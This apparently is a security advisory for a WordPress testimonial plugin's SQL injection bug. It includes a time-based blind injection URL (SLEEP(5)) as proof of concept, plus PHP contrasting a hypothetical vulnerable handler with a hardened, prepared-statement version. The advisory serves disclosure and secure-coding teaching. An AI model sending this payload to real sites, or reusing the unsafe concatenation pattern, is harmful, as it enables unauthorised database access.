EPSS Percentile: 36.7%
The plugin does not validate or escape the id parameter before using it in a SQL statement when retrieving a testimonial to edit, leading to SQL injection.
https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
plugins.trac.wordpress.org/changeset/2664185
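As an added illustration that is not the plugin's own code (function, table and nonce names are hypothetical), the unsafe pattern the advisory describes beside a hardened version that uses WordPress's absint(), $wpdb->prepare(), a capability check and a nonce:

```php
<?php
// Hypothetical vulnerable handler (illustrative, not the plugin's code):
// the raw id query parameter is concatenated into SQL, so whatever the
// client sends becomes part of the statement.
function example_get_testimonial_vulnerable( $wpdb ) {
    $id  = $_GET['id'];   // neither validated nor escaped
    $sql = "SELECT * FROM {$wpdb->prefix}example_testimonials WHERE id = " . $id;
    return $wpdb->get_row( $sql );
}

// Hardened form: only an authorised, nonce-protected request reaches the
// query; the id is coerced to a non-negative integer and bound through
// $wpdb->prepare() with a %d placeholder, so it can never alter the SQL.
function example_get_testimonial_fixed( $wpdb ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'example_edit_testimonial' ); // hypothetical nonce action

    // Reject anything that is not a plain positive integer rather than
    // silently truncating it, so tampering is visible in logs.
    if ( ! isset( $_GET['id'] ) || ! ctype_digit( (string) $_GET['id'] ) ) {
        wp_die( 'Invalid testimonial id.' );
    }
    $id = absint( $_GET['id'] );

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}example_testimonials WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}
```

On the fixed path a value such as the one in the proof of concept above fails the ctype_digit() check before any query is built, which is also a convenient point to log the attempt.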